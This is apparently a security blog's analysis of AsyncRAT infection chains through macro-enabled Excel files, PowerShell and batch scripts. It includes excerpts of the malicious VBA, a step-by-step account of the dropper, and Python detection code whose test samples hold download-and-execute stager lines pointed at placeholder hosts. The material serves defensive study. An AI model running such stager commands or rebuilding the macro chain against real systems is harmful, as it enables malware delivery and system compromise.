AsyncRAT: A Deep Dive into XLSM and Script-Based Cyber Attack Techniques

Explore how simple files are exploited to fuel advanced and sophisticated malware attacks in modern cyber threats.

Monday 24 March, 2025

AsyncRAT - Cyberware Hub

AsyncRAT, a Remote Access Trojan (RAT), originally developed as a legitimate open-source remote administration tool, has been extensively exploited by attackers for malicious purposes. Recent campaigns underscore its versatility in enabling data theft, remote command execution, and system compromise, posing significant threats to system security.

Here are some recent real-world examples of AsyncRAT attacks:

AsyncRAT has been actively used in global cyberattacks from 2023 to 2025, targeting countries like the US, India, Brazil, and Germany. Attackers exploited phishing emails and malicious file attachments to deploy the malware. It enabled remote access, data theft, and surveillance across various sectors.

Phishing Emails with Dropbox Links: In a recent campaign, attackers used phishing emails containing Dropbox URLs to distribute AsyncRAT payloads. The infection chain included multiple stages, starting with LNK, JavaScript, and BAT files, which ultimately deployed an obfuscated AsyncRAT payload. Trusted platforms like Dropbox and TryCloudflare were exploited to avoid detection.

Stealthy Malware Delivery via Python and TryCloudflare: Another notable campaign employed Python-based payloads and TryCloudflare tunnels for covert distribution. It began with phishing emails leading victims to a ZIP file containing malicious files. These files triggered a sequence of actions that resulted in the deployment of AsyncRAT and additional malware strains.

In one campaign, phishing emails containing Dropbox URLs were used to initiate a multi-step infection chain involving LNK, PowerShell script, and BAT files to deliver an obfuscated AsyncRAT payload. Attackers have also used trusted platforms like Dropbox and TryCloudflare to evade detection. Another campaign, dubbed Desert Dexter, demonstrated advanced techniques such as anti-sandbox measures to bypass security research environments, highlighting the increasing sophistication of AsyncRAT attacks.

Infection Chain:

Infection Method 1: Distribution through XLSM Macros

Cybercriminals are now embedding AsyncRAT in macro-enabled Excel spreadsheets (.xlsm), which are delivered through phishing emails posing as legitimate documents such as invoices, tax statements, or business proposals. Once the file is opened, users are urged to "Enable Content," unknowingly activating malicious macros that silently execute commands to download and install AsyncRAT.

Why XLSM Files?

  • Evades Detection: XLSM files often slip past standard email security filters.

  • Appears Legitimate: Macros are still common in business processes, raising less suspicion.

  • Stealthy Execution: The malware runs in the background without alerting the user, ensuring persistence.

Embedded VBA module functions:

Private Function Get7ZipPath() As String
    ' Locate an existing 7-Zip install; an empty string tells the caller
    ' that the macro must fetch its own copy (Step 2 below)
    If Dir("C:\Program Files\7-Zip\7z.exe") <> "" Then
        Get7ZipPath = "C:\Program Files\7-Zip\7z.exe"
    ElseIf Dir("C:\Program Files (x86)\7-Zip\7z.exe") <> "" Then
        Get7ZipPath = "C:\Program Files (x86)\7-Zip\7z.exe"
    Else
        Get7ZipPath = ""
    End If
End Function

Private Function DecodeBase64(base64 As String) As Byte()
    ' Uses the MSXML DOM's bin.base64 data type to turn base64 text into raw bytes,
    ' a common macro trick that avoids an explicit decoding API call
    Dim xmlDoc As Object, node As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set node = xmlDoc.createElement("b64")
    node.DataType = "bin.base64"
    node.Text = base64
    DecodeBase64 = node.nodeTypedValue
End Function

The malicious VBA code embedded within the Excel workbook is composed of multiple coordinated modules. Upon opening the document and enabling macros, the execution chain is initiated.

Step 1: Macro Activation and Entry Point
  • The macro checks whether macros are enabled.

  • If confirmed, it invokes the ViewInvoiceOnline subroutine.

Step 2: Dependency Check and 7-Zip Installation
  • The subroutine checks if 7-Zip is installed on the system. If missing, it:

      • Downloads a base64-encoded 7-Zip installer from https://xxxx.com/7z.txt.

      • Decodes the file and saves it as 7zip_installer.exe in the temporary directory.

      • Executes the installer silently.

Step 3: Malicious Payload Retrieval
  • The macro proceeds to download a ZIP archive from https://xxxxx.com/file/newuploavir/newpoveno.zip.

  • The file is saved to the same temporary directory.

Step 4: Archive Extraction
  • The ZIP file is extracted using 7-Zip with the hardcoded password 123456.

  • The archive is expected to contain:

      • DLLs: libcares-2.dll, msvcp290.dll, nasrallah_x86.dll, vcruntime210.dll

      • Executable: newpoveno.exe

Step 5: Environment Manipulation & Execution
  • The temporary folder is added to the system’s PATH environment variable.

  • The script attempts to register libcares-2.dll using regsvr32.exe.

  • Then, it executes newpoveno.exe with the temporary directory set as its working directory.

Step 6: Logging and Cleanup
  • Execution details are logged in invoice_log.txt, located in the user’s temporary directory.

  • After execution, the script attempts to delete the temporary directory and its contents to evade forensic analysis.
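The six steps above map onto a short sequence of process-creation events that an endpoint sensor (Sysmon Event ID 1 or an EDR equivalent) records, which is where a defender can catch this chain even when the workbook itself passes the mail filter. The following Python is an added example, not code from the original post or from any vendor: it walks constructed sample events, attributes each child process to its Office ancestor, and fires one rule per visible stage (a temp-folder executable launched from Office, 7-Zip invoked with an inline -p password, regsvr32 registering a DLL from the temp folder). The event field names, the victim paths and the benign control events are assumptions; the file names and the password come from the steps above.

```python
"""Correlate process-creation events into the XLSM -> 7-Zip -> regsvr32 -> payload chain.

Added example (not from the original post). Event shape loosely follows Sysmon
Event ID 1 (ProcessCreate); all events below are constructed, not real telemetry.
"""
import re
from typing import Optional

# Constructed sample events: pid 200 is Excel opening the lure workbook, and the
# chain described in Steps 2-5 of the post runs as its children. Usernames,
# folder names and the explorer/7zFM events are assumptions for the example.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\victim\Downloads\invoice.xlsm'},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\victim\AppData\Local\Temp\7zip_installer.exe",
     "cmdline": r"7zip_installer.exe /S"},
    {"pid": 310, "ppid": 200, "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r'"C:\Program Files\7-Zip\7z.exe" x -p123456 -oC:\Users\victim\AppData\Local\Temp\inv C:\Users\victim\AppData\Local\Temp\newpoveno.zip'},
    {"pid": 320, "ppid": 200, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\victim\AppData\Local\Temp\inv\libcares-2.dll"},
    {"pid": 330, "ppid": 200, "image": r"C:\Users\victim\AppData\Local\Temp\inv\newpoveno.exe",
     "cmdline": "newpoveno.exe"},
    # Benign control: the user launches the 7-Zip GUI from Explorer, no Office ancestor.
    {"pid": 400, "ppid": 100, "image": r"C:\Program Files\7-Zip\7zFM.exe",
     "cmdline": "7zFM.exe"},
]

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
ARCHIVERS = {"7z.exe", "7za.exe", "7zg.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
PASSWORD_SWITCH_RE = re.compile(r"(^|\s)-p\S+")  # 7-Zip's inline -p<password> switch


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_root(ev: dict, by_pid: dict) -> Optional[int]:
    """Return the pid of the nearest Office ancestor of ev, or None."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if _basename(cur["image"]) in OFFICE_IMAGES:
            return cur["pid"]
        cur = by_pid.get(cur["ppid"])
    return None


def classify(ev: dict, by_pid: dict) -> list:
    """Rule names that fire for a single event (each maps to one stage of the chain)."""
    name = _basename(ev["image"])
    cmd = ev["cmdline"]
    under_office = office_root(ev, by_pid) is not None
    hits = []
    # Steps 2 and 5: Office launching an executable dropped in the user's temp folder
    if under_office and TEMP_RE.search(ev["image"]):
        hits.append("office_spawns_temp_executable")
    # Step 4: Office driving 7-Zip with an inline password (-p123456 in the post)
    if under_office and name in ARCHIVERS and PASSWORD_SWITCH_RE.search(cmd):
        hits.append("office_spawns_7zip_password_extract")
    # Step 5: regsvr32 registering a DLL that lives in the temp folder
    if name == "regsvr32.exe" and TEMP_RE.search(cmd):
        hits.append("regsvr32_loads_temp_dll")
    return hits


def detect(events: list) -> dict:
    """Return per-process findings plus rules grouped under their Office ancestor."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings, chains = {}, {}
    for ev in events:
        hits = classify(ev, by_pid)
        if not hits:
            continue
        findings[ev["pid"]] = hits
        root = office_root(ev, by_pid)
        if root is not None:
            chains.setdefault(root, set()).update(hits)
    # Several distinct stages under one Office process are far more conclusive
    # than any single rule; sorting keeps the output stable.
    return {"findings": findings,
            "chains": {pid: sorted(rules) for pid, rules in chains.items()}}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for pid, rules in result["chains"].items():
        print(f"Office pid {pid} drove {len(rules)} stages of the chain: {', '.join(rules)}")
```

Grouping hits under the Office ancestor is the point: a lone regsvr32 of a temp DLL or a lone password-protected extraction has benign explanations, but three distinct stages hanging off one EXCEL.EXE within a short window is the Step 2 to Step 5 sequence almost exactly, and a real rule would add the timing window and the PATH modification from Step 5 on top of this skeleton.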

Infection Method 2: Distribution through PowerShell (.ps1) Scripts

PowerShell remains a favored tool for attackers to deploy AsyncRAT using obfuscated .ps1 scripts. These scripts are delivered via phishing links or embedded in document macros. Upon execution, they download the payload directly into memory, making it difficult for traditional antivirus solutions to detect.

Why PowerShell?

  • Fileless execution helps avoid leaving traces on disk.

  • Bypasses many defenses due to use of legitimate system tools.

  • Highly customizable, enabling complex attack chains.

In the PowerShell variant, victims are typically enticed through phishing emails or deceptive websites to click on malicious links or download files masquerading as legitimate tools such as system updates, file converters, or business applications. The PowerShell script is either embedded within a dropper document or executed directly via social engineering techniques, initiating a stealthy infection chain.

Infection Method 3: Distribution through Batch (.bat) Files

Attackers also use .bat files, which are simple command-line scripts, often attached to phishing emails or dropped by other malware. When run, they execute a series of commands to retrieve and launch AsyncRAT, frequently in combination with PowerShell or curl commands.

Why Batch Files?

  • Lightweight and easy to deploy in phishing campaigns.

  • Triggers multi-stage infections, including script-based payloads.

  • Compatible with most Windows environments, ensuring broad reach.

The Batch file (.bat) variant is commonly observed in simpler or multi-stage attacks, particularly in less sophisticated phishing campaigns. These batch files function as initial launchers, designed to invoke PowerShell scripts or fetch remote payloads, effectively acting as a bridge between the delivery mechanism and the full malware deployment.
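Both the PowerShell variant (Method 2) and the batch launcher (Method 3) surface as command lines in process-creation telemetry and, for PowerShell, in script block logging (Event ID 4104), so a lightweight scorer over those strings is a practical first filter. The following Python is an added example, not code from the original post: it scores command lines for the traits described above (hidden window, no profile, download-and-execute cmdlets, curl staging into %TEMP%) and decodes -EncodedCommand blobs, which are base64 over UTF-16LE text, so the inner script is scored as well. The indicator names, weights, threshold and the sample command lines (with example.invalid hosts) are constructed for the example.

```python
"""Score PowerShell and batch launcher command lines for AsyncRAT-style stager traits.

Added example (not from the original post). The regexes encode the traits the
post describes (in-memory download, obfuscation, temp-folder staging); the
sample command lines and the example.invalid hostnames are constructed.
"""
import base64
import re
from typing import Optional

# Each indicator is (name, pattern). Names and weights are assumptions for this example.
INDICATORS = [
    ("hidden_window", r"-w(indowstyle)?\s+hidden"),
    ("no_profile", r"-nop(rofile)?\b"),
    ("bypass_policy", r"-(ep|executionpolicy)\s+bypass"),
    ("invoke_expression", r"\biex\b|invoke-expression"),
    ("remote_download", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest"
                        r"|\biwr\b|\bcurl\b|\bwget\b|bitsadmin"),
    ("base64_decode", r"frombase64string"),
    ("in_memory_load", r"reflection\.assembly\]::load|assembly\]::load"),
    ("temp_path", r"%temp%|\\appdata\\local\\temp\\"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in INDICATORS]
# -EncodedCommand (and its short forms) followed by a base64 blob
ENCODED_RE = re.compile(r"-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
WEIGHTS = {"encoded_command": 2}          # everything else scores 1
SUSPICIOUS_AT = 3


def find_indicators(text: str) -> set:
    return {name for name, rx in COMPILED if rx.search(text)}


def decode_blob(blob: str) -> Optional[str]:
    """PowerShell encodes the script as UTF-16LE before base64; reverse that."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyze(cmdline: str) -> dict:
    """Score one command line, looking through -EncodedCommand to the inner script."""
    m = ENCODED_RE.search(cmdline)
    decoded = decode_blob(m.group(2)) if m else None
    # Drop the base64 blob before scanning so random base64 can never match a word pattern
    indicators = find_indicators(ENCODED_RE.sub(" ", cmdline))
    if m:
        indicators.add("encoded_command")
    if decoded is not None:
        indicators |= find_indicators(decoded)
    score = sum(WEIGHTS.get(name, 1) for name in indicators)
    return {"score": score, "indicators": sorted(indicators),
            "decoded": decoded, "suspicious": score >= SUSPICIOUS_AT}


# Constructed samples. The inner script of the first line is encoded here so the
# base64 is exact; it mimics the download-to-memory pattern the post describes.
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINES = [
    f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}",
    # A batch-file style launcher: curl stages a file in %TEMP%, then PowerShell runs it
    r"cmd.exe /c curl -s http://example.invalid/a.zip -o %TEMP%\a.zip && start /b powershell -nop -w hidden -File %TEMP%\a.ps1",
    # Benign control
    "powershell.exe -Command Get-Process | Sort-Object CPU",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        print(f"score={r['score']} suspicious={r['suspicious']} {r['indicators']}")
```

Treat the score as triage, not a verdict: legitimate administration tooling also uses -NoProfile and hidden windows, so the threshold should be tuned against the environment's own baseline, and hits are far stronger when paired with process ancestry (an Office, cmd.exe or script-host parent) before an alert is raised.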

Conclusion:

The AsyncRAT campaign showcases a multi-vector approach using XLSM files, PowerShell scripts, and batch files to deliver and execute malware. Its infection chain is carefully crafted to evade detection through trusted file formats and silent execution techniques. The use of tools like 7-Zip and regsvr32 adds to its stealth. Defending against such threats requires strong macro policies, script restrictions, and user awareness. A layered security strategy is essential to detect and disrupt these attacks.

The hunt doesn’t stop here. Stay tuned for more!